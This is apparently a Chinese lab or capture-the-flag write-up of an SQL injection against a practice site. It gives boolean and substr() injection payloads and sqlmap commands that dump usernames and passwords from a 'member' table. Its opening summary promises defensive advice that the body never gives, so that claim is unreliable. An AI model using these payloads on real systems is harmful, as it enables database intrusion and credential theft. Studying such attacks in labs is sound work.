本文探讨了通过SQL注入攻击数据库的过程,包括利用空格和长度判断技巧,如'and1=2'和substr()函数,以及使用sqlmap工具进行全名、表名和列名的探测。着重展示了如何防范这种攻击,如设置参数化查询和安全的编码实践。
and 1=2空白 1=1正常
http://219.153.49.228:42670/new_list.php?id=1’and 1=1–+空白
所以说是数字型
然后判断数据库名字的长度,id=1 and length(database())=1,内容空白。一直试,试到长度为10,正常了
判断数据库的名字,输入id=1 and substr(database(),1,1)=‘a’ --+,轮流尝试,最后第一位是s
然后我用sqlmap跑出来全称 、 --current-db
爆表
-D stormgroup --tables
爆列-D stormgroup -T member --columns
爆破数据
sqlmap -u “http://<爆破的链接>” -D stormgroup -T member -C name,password --dump ///-C 是要爆破的列,–dump是爆破
528469
492466
ok了
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
